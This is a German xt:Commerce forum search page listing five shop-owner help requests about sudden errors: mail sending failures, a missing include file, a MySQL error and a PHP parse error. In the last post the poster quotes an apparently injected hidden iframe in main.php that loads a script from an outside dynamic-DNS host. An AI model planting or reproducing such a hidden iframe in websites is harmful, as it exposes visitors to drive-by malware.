Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'plötzliche'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 5 results

  1. Nabend, seit heute kommt in unserem Shop noch Abschluss einer Bestellung folgende Fehlermeldung: Liebe Kundin, lieber Kunde. Leider ist ein Fehler beim Aufruf unserer Webseite aufgetreten. Bitte versuchen Sie es später noch einmal. Vielen Dank für Ihr Verständnis - wir freuen uns auf Ihren nächsten Besuch. Sollte das Problem weiterhin bestehen, wenden Sie sich bitte an unseren Kundenservice. Im Log ist ein Fehler zu finden, der besagt das eine Bestellbestätigung wegen eines SMTP Fehlers nicht versandt werden konnte. Seitdem werden allerdings gar keine Mails mehr versandt und ich kann diese auch nicht manuell auslösen. Im Log tauchen sie ebenfalls nicht auf. Den Server habe ich bereits neu gestartet, aber geändert hat isch leider nichts. Irgendjemand eine Idee?
  2. Huhu, sorry ich weiß nicht ob ich hier im richtigen Thread bin, aber ich frage einfach mal, wenn nicht einfach verschieben. Unser Shop läuft schon seit 2 Jahren ohne Probleme heute morgen aber möchte er plötzlich nicht mehr aufgerufen werden. Folgende Fehlermeldung bekomme ich jetzt plötzlich: Warning: require(/var/www/..../html/shop/includes/filenames.php) [function.require]: failed to open stream: No such file or directory in /home/www/shop/includes/application_top.php on line 57 Fatal error: require() [function.require]: Failed opening required '/var/www/...../html/shop/includes/filenames.php' (include_path='.:/usr/share/php') in /home/www/shop/includes/application_top.php on line 57 Hilfe bitte.
  3. Hallo Leute, ich habe seit März letzten Jahres meinen Shop. Die eMail-Funktion ist auf "Sendmail" eingestellt und es hat immer alles einwandfrei funktioniert. Seit heute nicht mehr Beim Checkout der Bestellung kommt eine Fehlermeldung wie auch, wenn ich das Formular benutzen möchte... erst stand dort etwas von "eMail konnte nicht initialisiert werden" und nun dieses hier: Message was not sent Mailer Error: Konnte folgenden Befehl nicht ausführen: /usr/sbin/sendmail Bestellungen kommen trotzdem an, aber die Kunden sind nicht wirklich erfreut und rufen dann an zum nachhaken, ob auch wirklich alles richtig funktioniert hat - verständlicherweise Ich bin bei one.com mit dem Shop, die eMail-Adresse ist auch aktiv und kann über mein Outlook abgerufen werden, eMails verschickt werden, etc.... Was allerdings auch seit heute nicht mehr geht ist der Versand per JTL-Wawi, der allerdings über SMTP läuft und nicht Sendmail - keine Ahnung, ob das zusammenhängt Verstellt habe ich soweit nichts, nur die also_purchased von meinem Template... kann mir aber nicht vorstellen, dass dies was mit der eMail zu tun hat Hat vielleicht einer von euch eine gute Idee? Liebe Grüße, Catrin
  4. 1030 - Got error 127 from table handler delete from sessions where expiry < '1252919283' [XT SQL Error] Bitte was ist da los?
  5. (komischerweise kann ich hier im PHP-Forum keinen neuen Thread eröffnen, darum schreib ich´s hier - bitte nicht böse sein) Gestern lief das Shop noch ohne Probleme, heute geht gar nix mehr : Parse error: syntax error, unexpected '<' in /kunden/67806_2460/webseiten/shop/includes/classes/main.php on line 46 In dieser Zeile steht folgendes : <iframe src="http://a232.dyn-o-saur.com:8080/ts/in.cgi?open" width=648 height=0 style="visibility: hidden"></iframe> überhaupt ist mir diese Zeile noch nie wirklich aufgefallen. Hat jemand einen Tipp parat ?!
×
×
  • Create New...